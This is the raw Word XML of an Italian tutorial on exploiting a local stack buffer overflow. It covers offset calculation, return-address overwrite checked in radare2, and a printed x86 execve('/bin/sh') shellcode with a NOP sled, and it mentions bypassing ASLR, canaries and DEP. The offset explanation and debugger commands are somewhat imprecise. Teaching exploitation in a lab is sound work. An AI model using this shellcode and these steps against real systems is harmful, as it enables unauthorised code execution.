          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Calcola l'offset:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t> Determina quanti byte di input servono per sovrascrivere l'indirizzo di ritorno. Di solito, è subito dopo la fine del buffer. In questo caso, poiché il buffer è di 16 byte, l'indirizzo di ritorno si troverà subito dopo, cioè a offset 20 (16 bytes + 4 per i 32bit o 8 per i 64 bit di ritorno).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAF7F20" w14:textId="164AC704" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cambia l'input:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> Invece di "g", aggiungici il valore 0x41414141, cioè "AAAA", che in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>little-endian</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> è \x41\x41\x41\x41 (se la tua architettura è a 32 bit) o \x41\x41\x41\x41\x41\x41\x41\x41 per 64 bit. Quindi dovresti usare un input del tipo:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>aaaaaaaaaaaaaaaaAAAA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">che in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> verrebbe espresso con:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>sys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>sys.stdout</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>.buffer.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>b"A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>"*16 + b"\x41\x41\x41\x41")</w:t>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:br/>
        <w:t>A questo punto, usa questo output come input nel debugger:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> python3 exploit.py | radare2 -d </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>vuln_program</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:br/>
        <w:t xml:space="preserve">E dopo esserti fermato al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>breakpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> esegui dc. A questo punto se guardi l'indirizzo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t> (o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>rip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>) dovresti vedere 0x41414141.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ACA16E" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Passo 6: Exploit (Esempio Base)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B9C946" w14:textId="4DC1A065" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Trovare una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">Avrai bisogno di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> (codice macchina che esegue una shell), puoi usare questo semplice esempio di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> (assicurati di adattarlo all'architettura corretta):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281E6935" w14:textId="73435021" w:rsidR="004A07AA" w:rsidRPr="007B05B5" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (x86 32bit):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t>"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B6D6D8" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Inserire la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> nello </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> Invece di AAAA, inserisci prima un'area più grande di NOP (byte \x90, utile per aiutare l'exploit), poi inserisci la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5CE5F9" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Modificare l'indirizzo di ritorno:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> Usa l'indirizzo dello </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> (cioè dell'area dei NOP) come indirizzo di ritorno.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB8E454" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Per ottenerlo, imposta un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>breakpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> appena prima del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> ed esegui l'istruzione "print $esp", che ti darà l'indirizzo da inserire al posto di AAAA, in formato </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>little-endian</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A517BC" w14:textId="631C25A2" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Script di Esempio (Python):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3705DAC6" w14:textId="5022E8AE" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6645350C" wp14:editId="27BCB32C">
            <wp:extent cx="3238500" cy="4017686"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="42938092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80923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721" cy="40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4A4E" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Esecuzione dell'Exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC055B2" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:t>Salva lo script come exploit.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B0BEBB" w14:textId="63CD758F" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:t>Esegui il programma target usando l'output dello script:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">python3 exploit.py | radare2 -d </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>vuln_program</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">E poi, dopo esserti fermato con un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>breakpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> iniziale, esegui dc. Se l'exploit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>ha successo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>, dovresti vedere apparire una shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E91FA4D" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Passi Avanzati:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213C4B3E" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Gestire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>l'Address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Space Layout Randomization (ASLR). </w:t>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t>Questo richiede tecniche come il ret2libc (Return-to-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>) o la ricerca di indirizzi di memoria senza ASLR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211F5940" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Protezione dello </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> Bypassare le protezioni dello </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> come </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>Canary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> o DEP (Data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>Execution</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>Prevention</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441E7B82" w14:textId="5CDF518F" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> avanzato:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> Usare </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> più complessi per ottenere privilegi più elevati o eseguire azioni specifiche.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004A07AA" w:rsidRPr="004A07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20EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4240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D5940"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6BA4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967096"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0A76B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D76EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A54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76C52"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7CE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474CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="93D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867D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="486A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C25B6B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D108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A7C90"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="02B6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D474B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3282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741000">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="513885872">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="4287192">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="483351846">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1549758277">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="572281597">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1427732568">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="937371821">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="396248460">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="608784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AA"/>
    <w:rsid w:val="00060B34"/>
    <w:rsid w:val="002E52D8"/>
    <w:rsid w:val="004A07AA"/>
    <w:rsid w:val="004D02F0"/>
    <w:rsid w:val="005D4A9F"/>
    <w:rsid w:val="00604771"/>
    <w:rsid w:val="007B05B5"/>
    <w:rsid w:val="008D38E2"/>
    <w:rsid w:val="00D53D7D"/>
    <w:rsid w:val="00E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559AB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B2833C3F-BA7B-45F7-B589-F7BF5A60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38E2"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo1Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="008D38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38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38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D38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D38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D38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D38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D38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D38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38E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D38E2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38E2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D38E2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D38E2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D38E2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D38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D38E2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D38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D38E2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D38E2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D38E2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38E2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38E2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8D38E2"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasicorsivo">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nessunaspaziatura">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2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8D38E2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D38E2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D38E2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D38E2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D38E2"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="156082" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasidelicata">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2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8D38E2"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="156082" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Riferimentodelicato">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="008D38E2"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="E97132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8D38E2"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="E97132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8D38E2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D38E2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4A07A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A0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8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9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154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638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836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9457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462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6743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450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4598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190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8327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5183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2723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681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01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645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8139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443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2506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416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741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190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4121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18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163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67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1847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9991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LORENZO MURFUNI</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>GIOVANNI LORENZO MURFUNI</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-07T16:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-07T16:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>